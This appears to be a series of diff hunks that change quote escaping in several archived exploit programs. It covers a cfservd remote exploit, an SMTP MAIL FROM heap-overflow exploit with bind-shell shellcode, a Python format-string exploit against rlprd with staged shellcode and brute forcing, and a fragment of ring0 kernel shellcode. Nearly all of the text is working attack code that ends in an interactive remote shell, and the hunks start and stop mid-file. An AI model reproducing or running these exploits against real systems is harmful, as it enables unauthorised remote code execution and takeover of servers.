time_out=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'b\':
|
||||
case 'b':
|
||||
buffsize=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'a\':
|
||||
case 'a':
|
||||
align=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'h\':
|
||||
case 'h':
|
||||
ok=1;
|
||||
sockadd.sin_addr.s_addr = inet_addr(optarg);
|
||||
break;
|
||||
|
||||
case \'r\':
|
||||
case 'r':
|
||||
retsize=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'t\':
|
||||
case 't':
|
||||
t_port=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'s\':
|
||||
case 's':
|
||||
s_port=atoi(optarg);
|
||||
break;
|
||||
|
||||
case \'o\':
|
||||
case 'o':
|
||||
offset=atoi(optarg);
|
||||
break;
|
||||
|
||||
|
@ -347,16 +347,16 @@ int main(int argc, char *argv[]) {
|
|||
}
|
||||
}
|
||||
|
||||
if (!ok || (mode&&((strcmp(ip,\"\")==0)) ) ) { usage(argv[0]); }
|
||||
if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); }
|
||||
|
||||
if (!(buf=malloc(buffsize+1))) {
|
||||
err_exit(\"-> malloc() error\");
|
||||
err_exit("-> malloc() error");
|
||||
}
|
||||
|
||||
ret_addr=RET_ADDR-offset;
|
||||
fprintf(stdout,\"\\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\\n\");
|
||||
fprintf(stdout,\"Tested to work against cfservd 2.0.7 on Redhat 8.0\\n\\n\");
|
||||
fprintf(stdout,\"-> Using return address of 0x%08x\\n\", ret_addr);
|
||||
fprintf(stdout,"\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\n");
|
||||
fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n");
|
||||
fprintf(stdout,"-> Using return address of 0x%08x\n", ret_addr);
|
||||
|
||||
ptr=buf;
|
||||
for(i=0;i<HDR_SIZE+align;i++) { *ptr++=HDR; }
|
||||
|
@ -379,23 +379,23 @@ int main(int argc, char *argv[]) {
|
|||
sockadd.sin_port = htons(t_port);
|
||||
|
||||
if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
|
||||
err_exit(\"-> socket error\");
|
||||
err_exit("-> socket error");
|
||||
}
|
||||
|
||||
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
|
||||
err_exit(\"-> connect() error\");
|
||||
err_exit("-> connect() error");
|
||||
}
|
||||
|
||||
if (mode) {
|
||||
|
||||
fprintf(stdout,\"-> \'Listening\' mode...( port: %d )\\n\",s_port);
|
||||
fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port);
|
||||
|
||||
if (fork()==0) {
|
||||
sleep(2);
|
||||
if (send(s1,buf,buffsize,0)<0) {
|
||||
err_exit(\"-> send() error\");
|
||||
err_exit("-> send() error");
|
||||
}
|
||||
fprintf(stdout,\"-> Exploit string sent....\\n\");
|
||||
fprintf(stdout,"-> Exploit string sent....\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -405,7 +405,7 @@ int main(int argc, char *argv[]) {
|
|||
alarm(time_out);
|
||||
|
||||
if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) {
|
||||
err_exit(\"-> socket error\");
|
||||
err_exit("-> socket error");
|
||||
}
|
||||
|
||||
memset(&sockadd,0,sizeof(sockadd));
|
||||
|
@ -415,26 +415,26 @@ int main(int argc, char *argv[]) {
|
|||
i_len=sizeof(sockadd);
|
||||
|
||||
if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) {
|
||||
err_exit(\"-> bind() error\");
|
||||
err_exit("-> bind() error");
|
||||
}
|
||||
|
||||
if (listen(s2,0)<0) {
|
||||
err_exit(\"-> listen() error\");
|
||||
err_exit("-> listen() error");
|
||||
}
|
||||
|
||||
wait();
|
||||
close(s1);
|
||||
fprintf(stdout,\"-> Waiting for connection....\\n\");
|
||||
fprintf(stdout,"-> Waiting for connection....\n");
|
||||
|
||||
s1=accept(s2,(struct sockaddr *)&sockadd,&i_len);
|
||||
|
||||
if (s1<0) {
|
||||
err_exit(\"-> accept() error\");
|
||||
err_exit("-> accept() error");
|
||||
}
|
||||
|
||||
alarm(0);
|
||||
|
||||
fprintf(stdout,\"-> Connection from: %s\\n\",inet_ntoa(sockadd.sin_addr));
|
||||
fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr));
|
||||
|
||||
sendcmd(s1);
|
||||
doshell(s1);
|
||||
|
@ -446,28 +446,28 @@ int main(int argc, char *argv[]) {
|
|||
else {
|
||||
|
||||
if (send(s1,buf,buffsize,0)<0) {
|
||||
err_exit(\"-> send() error\");
|
||||
err_exit("-> send() error");
|
||||
}
|
||||
|
||||
close(s1);
|
||||
|
||||
fprintf(stdout,\"-> \'Connecting\' mode...\\n\");
|
||||
fprintf(stdout,\"-> Exploit string sent. Waiting for a shell...\\n\");
|
||||
fprintf(stdout,"-> 'Connecting' mode...\n");
|
||||
fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n");
|
||||
sleep(2);
|
||||
|
||||
sockadd.sin_family = AF_INET;
|
||||
sockadd.sin_port = htons(s_port);
|
||||
|
||||
if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
|
||||
err_exit(\"-> socket() error\");
|
||||
err_exit("-> socket() error");
|
||||
}
|
||||
|
||||
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
|
||||
fprintf(stdout,\"-> Exploit failed. Target probably segfaulted...\\n\\n\");
|
||||
fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fprintf(stdout,\"-> Connecting to shell at %s:%d\\n\",inet_ntoa(sockadd.sin_addr),s_port);
|
||||
fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port);
|
||||
|
||||
sendcmd(s1);
|
||||
doshell(s1);
|
||||
|
|
|
@ -26,29 +26,29 @@ This BID will be updated when more information becomes available.
|
|||
*
|
||||
* Notes:
|
||||
*
|
||||
* You can\'t have any characters in overflow buffer that isspace() returns true
|
||||
* You can't have any characters in overflow buffer that isspace() returns true
|
||||
* for. The shellcode is clear of them, but if your return address or retloc
|
||||
* has one you gotta figure out another one. My slack box has that situation,
|
||||
* heap is at 0x080d.. My gentoo laptop had no such problem and all was fine. I
|
||||
* don\'t have anymore time to BS around with this and make perfect for any and
|
||||
* all, b/c I\'ve got exam to study for and Law and Order:CI is on in an hour.
|
||||
* If the heap you\'re targetting is the same way, then try filling it up using
|
||||
* some other commands. If the GOT you\'re targetting is at such address than
|
||||
* overwrite a return address on the stack. Surely there\'s a way, check out the
|
||||
* source and be creative; I\'m sure there are some memory leaks somewhere you
|
||||
* don't have anymore time to BS around with this and make perfect for any and
|
||||
* all, b/c I've got exam to study for and Law and Order:CI is on in an hour.
|
||||
* If the heap you're targetting is the same way, then try filling it up using
|
||||
* some other commands. If the GOT you're targetting is at such address than
|
||||
* overwrite a return address on the stack. Surely there's a way, check out the
|
||||
* source and be creative; I'm sure there are some memory leaks somewhere you
|
||||
* can use to fill up heap as well.
|
||||
*
|
||||
* You might run into some ugliness trying to automate this for a couple
|
||||
* reasons. xmalloc() stores a cookie in front of buffer, and xfree() checks
|
||||
* for this cookie before calling free(). So you\'re going to need that aligned
|
||||
* for this cookie before calling free(). So you're going to need that aligned
|
||||
* properly unless you can cook up a way to exploit it when it bails out in
|
||||
* xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so
|
||||
* maybe you can be clever and do something there). Furthermore I found that
|
||||
* when trying to trigger this multiple times the alignment was different each
|
||||
* time. There are \"definitely\" more reliable ways to exploit this if you take
|
||||
* a deeper look into code which I don\'t have time to do right now. The padding
|
||||
* time. There are "definitely" more reliable ways to exploit this if you take
|
||||
* a deeper look into code which I don't have time to do right now. The padding
|
||||
* parameter controls the alignment and the size of the chunk being allocated.
|
||||
* You\'ll probably have to play with it. Yes that\'s fugly.
|
||||
* You'll probably have to play with it. Yes that's fugly.
|
||||
*
|
||||
* [n00b@crapbox.outernet] ./a.out
|
||||
* Usage: ./a.out < host > < padding > < retloc > < retaddr >
|
||||
|
@ -67,11 +67,11 @@ This BID will be updated when more information becomes available.
|
|||
*
|
||||
* --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
|
||||
*
|
||||
* --{ Attempting to redefine the meaning of \'definitely\'
|
||||
* --{ Attempting to redefine the meaning of 'definitely'
|
||||
*
|
||||
* --{ Got a shell
|
||||
*
|
||||
* --{ Updating Webster\'s
|
||||
* --{ Updating Webster's
|
||||
* --{ definitely, adv.:
|
||||
* --{ 1. See specious
|
||||
*
|
||||
|
@ -110,7 +110,7 @@ This BID will be updated when more information becomes available.
|
|||
|
||||
#define Z(x, len) memset((x), 0, (len))
|
||||
#define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0)
|
||||
#define bye(fmt, args...) do{ fprintf(stderr, fmt\"\\n\", ##args);
|
||||
#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args);
|
||||
#exit(EXIT_FAILURE); }while(0)
|
||||
|
||||
|
||||
|
@ -119,15 +119,15 @@ This BID will be updated when more information becomes available.
|
|||
#define SHELL_PORT 6969
|
||||
#define NOP 0x90
|
||||
char sc[] =
|
||||
\"\\xeb\\x0e\"\"notexploitable\"
|
||||
\"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x39\\xc6\\x04\\x24\\x02\\x89\\xe6\\xb0\\x02\"
|
||||
\"\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\\x6a\\x01\\x6a\\x02\"
|
||||
\"\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\\x10\\x56\\x50\\x89\\xe1\\xb0\"
|
||||
\"\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\"
|
||||
\"\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\"
|
||||
\"\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\"
|
||||
\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x6b\\x2c\\x60\\xcd\"
|
||||
\"\\x80\";
|
||||
"\xeb\x0e""notexploitable"
|
||||
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x04\x24\x02\x89\xe6\xb0\x02"
|
||||
"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50\x6a\x01\x6a\x02"
|
||||
"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a\x10\x56\x50\x89\xe1\xb0"
|
||||
"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x04\xcd"
|
||||
"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89"
|
||||
"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f"
|
||||
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x6b\x2c\x60\xcd"
|
||||
"\x80";
|
||||
|
||||
|
||||
/* a dlmalloc chunk descriptor */
|
||||
|
@ -148,7 +148,7 @@ ssize_t Send(int s, const void *buf, size_t len, int flags)
|
|||
|
||||
n = send(s, buf, len, flags);
|
||||
if(n < 0)
|
||||
die(\"send\");
|
||||
die("send");
|
||||
|
||||
return n;
|
||||
}
|
||||
|
@ -160,7 +160,7 @@ ssize_t Recv(int s, void *buf, size_t len, int flags)
|
|||
|
||||
n = recv(s, buf, len, flags);
|
||||
if(n < 0)
|
||||
die(\"recv\");
|
||||
die("recv");
|
||||
|
||||
return n;
|
||||
}
|
||||
|
@ -176,7 +176,7 @@ int conn(char *host, u_short port)
|
|||
|
||||
hp = gethostbyname(host);
|
||||
if (hp == NULL) {
|
||||
bye(\"gethostbyname failed with error %s\", hstrerror(h_errno));
|
||||
bye("gethostbyname failed with error %s", hstrerror(h_errno));
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
|
@ -184,10 +184,10 @@ int conn(char *host, u_short port)
|
|||
|
||||
sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if (sock < 0)
|
||||
die(\"socket\");
|
||||
die("socket");
|
||||
|
||||
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
|
||||
die(\"connect\");
|
||||
die("connect");
|
||||
|
||||
return sock;
|
||||
}
|
||||
|
@ -201,15 +201,15 @@ void shell(char *host, u_short port)
|
|||
|
||||
sock = conn(host, port);
|
||||
|
||||
printf(\"--{ Got a shell\\n\\n\"
|
||||
\"--{ Updating Webster\'s\\n\"
|
||||
\"--{ definitely, adv.:\\n\"
|
||||
\"--{ 1. See specious\\n\\n\"
|
||||
\"--{ For the linguistically challenged...\\n\"
|
||||
\"--{ specious, adj. :\\n\"
|
||||
\"--{ 1. Having the ring of truth or plausibility but \"
|
||||
\"actually fallacious\\n\"
|
||||
\"--{ 2. Deceptively attractive\\n\\n\"
|
||||
printf("--{ Got a shell\n\n"
|
||||
"--{ Updating Webster's\n"
|
||||
"--{ definitely, adv.:\n"
|
||||
"--{ 1. See specious\n\n"
|
||||
"--{ For the linguistically challenged...\n"
|
||||
"--{ specious, adj. :\n"
|
||||
"--{ 1. Having the ring of truth or plausibility but "
|
||||
"actually fallacious\n"
|
||||
"--{ 2. Deceptively attractive\n\n"
|
||||
);
|
||||
|
||||
FD_ZERO(&rfds);
|
||||
|
@ -219,29 +219,29 @@ void shell(char *host, u_short port)
|
|||
FD_SET(sock, &rfds);
|
||||
|
||||
if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
|
||||
die(\"select\");
|
||||
die("select");
|
||||
|
||||
if (FD_ISSET(STDIN_FILENO, &rfds)) {
|
||||
l = read(0, buf, BS);
|
||||
if(l < 0)
|
||||
die(\"read\");
|
||||
die("read");
|
||||
else if(l == 0)
|
||||
bye(\"\\n - Connection closed by user\\n\");
|
||||
bye("\n - Connection closed by user\n");
|
||||
|
||||
if (write(sock, buf, l) < 1)
|
||||
die(\"write\");
|
||||
die("write");
|
||||
}
|
||||
|
||||
if (FD_ISSET(sock, &rfds)) {
|
||||
l = read(sock, buf, sizeof(buf));
|
||||
|
||||
if (l == 0)
|
||||
bye(\"\\n - Connection terminated.\\n\");
|
||||
bye("\n - Connection terminated.\n");
|
||||
else if (l < 0)
|
||||
die(\"\\n - Read failure\\n\");
|
||||
die("\n - Read failure\n");
|
||||
|
||||
if (write(STDOUT_FILENO, buf, l) < 1)
|
||||
die(\"write\");
|
||||
die("write");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -255,13 +255,13 @@ int parse_args(int argc, char **argv, char **host, int *npad,
|
|||
|
||||
*host = argv[1];
|
||||
|
||||
if(sscanf(argv[2], \"%d\", npad) != 1)
|
||||
if(sscanf(argv[2], "%d", npad) != 1)
|
||||
return 1;
|
||||
|
||||
if(sscanf(argv[3], \"%x\", retloc) != 1)
|
||||
if(sscanf(argv[3], "%x", retloc) != 1)
|
||||
return 1;
|
||||
|
||||
if(sscanf(argv[4], \"%x\", retaddr) != 1)
|
||||
if(sscanf(argv[4], "%x", retaddr) != 1)
|
||||
return 1;
|
||||
|
||||
return 0;
|
||||
|
@ -279,35 +279,35 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr)
|
|||
/* read greeting */
|
||||
n = Recv(sock, buf, BS, 0);
|
||||
if(n == 0)
|
||||
bye(\"Server didn\'t even say hi\");
|
||||
bye("Server didn't even say hi");
|
||||
|
||||
/* send HELO */
|
||||
n = snprintf(buf, BS, \"HELO localhost\\r\\n\");
|
||||
n = snprintf(buf, BS, "HELO localhost\r\n");
|
||||
Send(sock, buf, n, 0);
|
||||
Z(buf, BS);
|
||||
n = Recv(sock, buf, BS, 0);
|
||||
if(n == 0)
|
||||
bye(\"Server didn\'t respond to HELO\");
|
||||
bye("Server didn't respond to HELO");
|
||||
|
||||
printf(\"--{ Said HELO\\n\\n\");
|
||||
printf("--{ Said HELO\n\n");
|
||||
|
||||
/*
|
||||
* Build evil chunk overflow. The need to align chunk exactly makes this
|
||||
* not so robust. In my short testing I wasn\'t able to get free() called
|
||||
* directly on an area of memory we control. I\'m sure you can though if you
|
||||
* take some time to study process heap behavior. Note though that you\'ll
|
||||
* not so robust. In my short testing I wasn't able to get free() called
|
||||
* directly on an area of memory we control. I'm sure you can though if you
|
||||
* take some time to study process heap behavior. Note though that you'll
|
||||
* have to fill in the magic cookie field that xmalloc()/xfree() and some
|
||||
* other functions use, so you\'ll still need to have it aligned properly
|
||||
* other functions use, so you'll still need to have it aligned properly
|
||||
* which defeats the whole purpose. This exploits the free() call on the
|
||||
* buffer we overflow, so you have to align the next chunk accordingly.
|
||||
* Anyhow on newest glibc there is a check for negative size field on the
|
||||
* chunk being freed, and program dies if it is negative (the exact
|
||||
* condition is not negative, but it has that effect pretty much, but go
|
||||
* look yourself ;)), So the techniques outlined by gera in phrack don\'t
|
||||
* look yourself ;)), So the techniques outlined by gera in phrack don't
|
||||
* work (being able to point all chunks at our two evil chunks). Check out
|
||||
* most recent glibc code in _int_free() if you haven\'t already.
|
||||
* most recent glibc code in _int_free() if you haven't already.
|
||||
*/
|
||||
memset(pad, \'A\', npad);
|
||||
memset(pad, 'A', npad);
|
||||
|
||||
chunk.dummy = CHUNKSZ;
|
||||
chunk.prevsz = CHUNKSZ;
|
||||
|
@ -318,20 +318,20 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr)
|
|||
evil[CHUNKLEN] = 0;
|
||||
|
||||
/* send the overflow */
|
||||
n = snprintf(buf, BS, \"MAIL FROM:<A!@A:%s> %s%s\\n\", pad, evil, sc);
|
||||
n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);
|
||||
Send(sock, buf, n, 0);
|
||||
Z(buf, BS);
|
||||
|
||||
printf(\"--{ Sent MAIL FROM overflow\\n\\n\");
|
||||
printf("--{ Sent MAIL FROM overflow\n\n");
|
||||
|
||||
#define SLEEP_TIME 15
|
||||
setbuf(stdout, NULL);
|
||||
printf(\"--{ Going for shell in \");
|
||||
printf("--{ Going for shell in ");
|
||||
for(n = 0; n < SLEEP_TIME; n++){
|
||||
printf(\"%d \", SLEEP_TIME-n);
|
||||
printf("%d ", SLEEP_TIME-n);
|
||||
sleep(1);
|
||||
}
|
||||
puts(\"\\n\");
|
||||
puts("\n");
|
||||
}
|
||||
|
||||
|
||||
|
@ -344,21 +344,21 @@ int main(int argc, char **argv)
|
|||
char *host = NULL;
|
||||
|
||||
if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
|
||||
bye(\"Usage: %s < host > < padding > < retloc > < retaddr >\\n\", argv[0]);
|
||||
bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);
|
||||
|
||||
printf(\"--{ Smack 1.oohaah\\n\\n\");
|
||||
printf("--{ Smack 1.oohaah\n\n");
|
||||
|
||||
sock = conn(host, SMTP_PORT);
|
||||
|
||||
printf(\"--{ definitely, adv.:\\n\"
|
||||
\"--{ 1. Having distinct limits\\n\"
|
||||
\"--{ 2. Indisputable; certain\\n\"
|
||||
\"--{ 3. Clearly defined; explicitly precise\\n\\n\"
|
||||
printf("--{ definitely, adv.:\n"
|
||||
"--{ 1. Having distinct limits\n"
|
||||
"--{ 2. Indisputable; certain\n"
|
||||
"--{ 3. Clearly defined; explicitly precise\n\n"
|
||||
);
|
||||
|
||||
sploit(sock, npad, retloc, retaddr);
|
||||
|
||||
printf(\"--{ Attempting to redefine the meaning of \'definitely\'\\n\\n\");
|
||||
printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");
|
||||
|
||||
shell(host, SHELL_PORT);
|
||||
|
||||
|
|
|
@ -17,18 +17,18 @@ pad = 2
|
|||
#0000000F FFE1 jmp ecx
|
||||
|
||||
# read(4, esp, -1); jmp ecx
|
||||
lnx_readsc = \"\\x31\\xdb\\xf7\\xe3\\xb0\\x03\\x80\\xc3\\x04\\x89\\xe1\\x4a\\xcd\\x80\\xff\\xe1\"
|
||||
lnx_stage_one = \"\\x90\" * (23 - len(lnx_readsc)) + lnx_readsc
|
||||
lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
|
||||
lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
|
||||
# dup2 shellcode(4->0,1,2)
|
||||
lnx_stage_two = \"\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\xb2\\x3f\\x88\\xd0\\xb3\\x04\"
|
||||
lnx_stage_two += \"\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\"
|
||||
lnx_stage_two = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04"
|
||||
lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
|
||||
# execute /bin/sh
|
||||
lnx_stage_two += \"\\x90\" * 100
|
||||
lnx_stage_two += \"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"
|
||||
lnx_stage_two += \"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\"
|
||||
lnx_stage_two += \"\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"
|
||||
lnx_stage_two += "\x90" * 100
|
||||
lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68"
|
||||
lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
|
||||
lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80"
|
||||
|
||||
targets = [ [ 0 ], [ \"Compiled test platform\", 0x0804c418, 0xbffff9e8 ] ]
|
||||
targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ]
|
||||
|
||||
bruteforce = 0
|
||||
|
||||
|
@ -37,13 +37,13 @@ self.host = host
|
|||
self.port = port
|
||||
|
||||
set = 0
|
||||
if(os == \"linux\"):
|
||||
if(os == "linux"):
|
||||
set = 1
|
||||
self.stage_one = self.lnx_stage_one
|
||||
self.stage_two = self.lnx_stage_two
|
||||
|
||||
if(set == 0):
|
||||
print \"Unknown OS\"
|
||||
print "Unknown OS"
|
||||
os._exit()
|
||||
|
||||
self.os = os
|
||||
|
@ -74,48 +74,48 @@ self.fd.connect((self.host, self.port))
|
|||
|
||||
def exploit(self, where, what):
|
||||
if(not self.fd or self.fd is None): self.connect()
|
||||
self.already_written = len(\'gethostbyname(\')
|
||||
self.already_written = len('gethostbyname(')
|
||||
|
||||
#print \"# of nops: %d\\n\" % (23 - len(self.readsc))
|
||||
#print "# of nops: %d\n" % (23 - len(self.readsc))
|
||||
|
||||
exploit = \"x\" * self.pad
|
||||
exploit = "x" * self.pad
|
||||
self.already_written += self.pad
|
||||
|
||||
exploit += struct.pack(\"<l\", where)
|
||||
exploit += struct.pack(\"<l\", where + 2)
|
||||
exploit += struct.pack("<l", where)
|
||||
exploit += struct.pack("<l", where + 2)
|
||||
self.already_written += 8
|
||||
|
||||
l = self.wl16(what & 0xffff)
|
||||
fill = \"%1$\" + str(l) + \"u\"
|
||||
fill = "%1$" + str(l) + "u"
|
||||
exploit += fill
|
||||
|
||||
exploit += \"%7$hn\"
|
||||
exploit += "%7$hn"
|
||||
|
||||
l = self.wl16(what >> 16)
|
||||
fill = \"%1$\" + str(l) + \"u\"
|
||||
fill = "%1$" + str(l) + "u"
|
||||
exploit += fill
|
||||
|
||||
exploit += \"%8$hn\"
|
||||
exploit += "%8$hn"
|
||||
|
||||
#print \"[*] Format string: (%s) Len: %d\" % (exploit, len(exploit))
|
||||
#print \"[*] Stage 1 length: %d\" % len(self.stage_one)
|
||||
#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
|
||||
#print "[*] Stage 1 length: %d" % len(self.stage_one)
|
||||
|
||||
#time.sleep(5)
|
||||
try:
|
||||
self.fd.send(exploit + self.stage_one + \"\\n\")
|
||||
self.fd.send(exploit + self.stage_one + "\n")
|
||||
self.fd.send(self.stage_two)
|
||||
time.sleep(1)
|
||||
self.fd.send(\"echo spawned; uname -a; id -a;\\n\")
|
||||
print \"Recieved: \" + self.fd.recv(1024)
|
||||
self.fd.send("echo spawned; uname -a; id -a;\n")
|
||||
print "Recieved: " + self.fd.recv(1024)
|
||||
except:
|
||||
self.fd.close()
|
||||
self.fd = None
|
||||
print \"\\tFailed @ 0x%08x\" % what
|
||||
print "\tFailed @ 0x%08x" % what
|
||||
return 0
|
||||
|
||||
remote = telnetlib.Telnet()
|
||||
remote.sock = self.fd
|
||||
print \"[*] You should now have a shell\"
|
||||
print "[*] You should now have a shell"
|
||||
remote.interact()
|
||||
os.exit(0)
|
||||
|
||||
|
@ -125,23 +125,23 @@ r.exploit(where, i)
|
|||
|
||||
def run(self):
|
||||
if(self.bruteforce):
|
||||
print \"Bruteforcing..\"
|
||||
#print \"not implemented yet\"
|
||||
print "Bruteforcing.."
|
||||
#print "not implemented yet"
|
||||
#os._exit(1)
|
||||
for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
|
||||
print \"Trying: 0x%08x\" % i
|
||||
print "Trying: 0x%08x" % i
|
||||
self.force(i, 0xbffffa00, 0xbffff9c0)
|
||||
|
||||
#self.exploit(self.args[1], self.args[2])
|
||||
|
||||
if __name__ == \'__main__\':
|
||||
if __name__ == '__main__':
|
||||
if(len(sys.argv) != 4):
|
||||
print \"%s host [linux] targetid\"
|
||||
print \"- 0 to brute force\"
|
||||
print \"- 1 custom compile\"
|
||||
print "%s host [linux] targetid"
|
||||
print "- 0 to brute force"
|
||||
print "- 1 custom compile"
|
||||
os._exit(0)
|
||||
|
||||
print \"%s-%s-%s\" % (sys.argv[1], sys.argv[2], sys.argv[3])
|
||||
print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
|
||||
r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
|
||||
#r.exploit(0x0804c418, 0xbffff9e8)
|
||||
#r.force(0x0804c418, 0xbffffa00, 0xbffff800)
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
* ....
|
||||
* ....
|
||||
* the function re-uses args in the stack before returning so we
|
||||
* can\'t trash them overwriting.
|
||||
* can't trash them overwriting.
|
||||
* Different compiled module [ex. different version of gcc] may require
|
||||
* a different pad value.. (see -g option)
|
||||
*
|
||||
|
@ -130,69 +130,69 @@ unsigned int pad_space = PAD_SPACE;
|
|||
|
||||
#define SUB_OFFSET_PATCH 8
|
||||
char ring0_code[]=
|
||||
\"\\xe8\\x00\\x00\\x00\\x00\" //call 8048359 <main+0x21>
|
||||
\"\\x5e\" //pop %esi
|
||||
\"\\x81\\xee\\x88\\x00\\x00\\x00\" //sub $0x88,%esi /* PATCH */
|
||||
\"\\x31\\xc0\" //xor %eax,%eax
|
||||
\"\\xb0\\x04\" //mov $0x4,%al
|
||||
\"\\x01\\xc4\" //add %eax,%esp
|
||||
\"\\x83\\x3c\\x24\\x73\" //cmp $0x73,%esp
|
||||
\"\\x75\\xf8\" //jne 8048364 <main+0x2c>
|
||||
\"\\x83\\x7c\\x24\\x0c\\x7b\" //cmpl $0x7b,0xc(%esp)
|
||||
\"\\x75\\xf1\" //jne 8048364 <main+0x2c>
|
||||
\"\\x29\\xc4\" //sub %eax,%esp
|
||||
\"\\x8b\\x7c\\x24\\x0c\" //mov 0xc(%esp),%edi
|
||||
\"\\x89\\x3c\\x24\" //mov %edi,(%esp)
|
||||
\"\\x31\\xc9\" //xor %ecx,%ecx
|
||||
\"\\xb1\\x5b\" //mov $0x5b,%cl /* FIX */
|
||||
\"\\xf3\\xa4\" //rep movsb %ds:(%esi),%es:(%edi)
|
||||
\"\\xcf\"; //iret
|
||||
"\xe8\x00\x00\x00\x00" //call 8048359 <main+0x21>
|
||||
"\x5e" //pop %esi
|
||||
"\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */
|
||||
"\x31\xc0" //xor %eax,%eax
|
||||
"\xb0\x04" //mov $0x4,%al
|
||||
"\x01\xc4" //add %eax,%esp
|
||||
"\x83\x3c\x24\x73" //cmp $0x73,%esp
|
||||
"\x75\xf8" //jne 8048364 <main+0x2c>
|
||||
"\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp)
|
||||
"\x75\xf1" //jne 8048364 <main+0x2c>
|
||||
"\x29\xc4" //sub %eax,%esp
|
||||
"\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi
|
||||
"\x89\x3c\x24" //mov %edi,(%esp)
|
||||
"\x31\xc9" //xor %ecx,%ecx
|
||||
"\xb1\x5b" //mov $0x5b,%cl /* FIX */
|
||||
"\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi)
|
||||
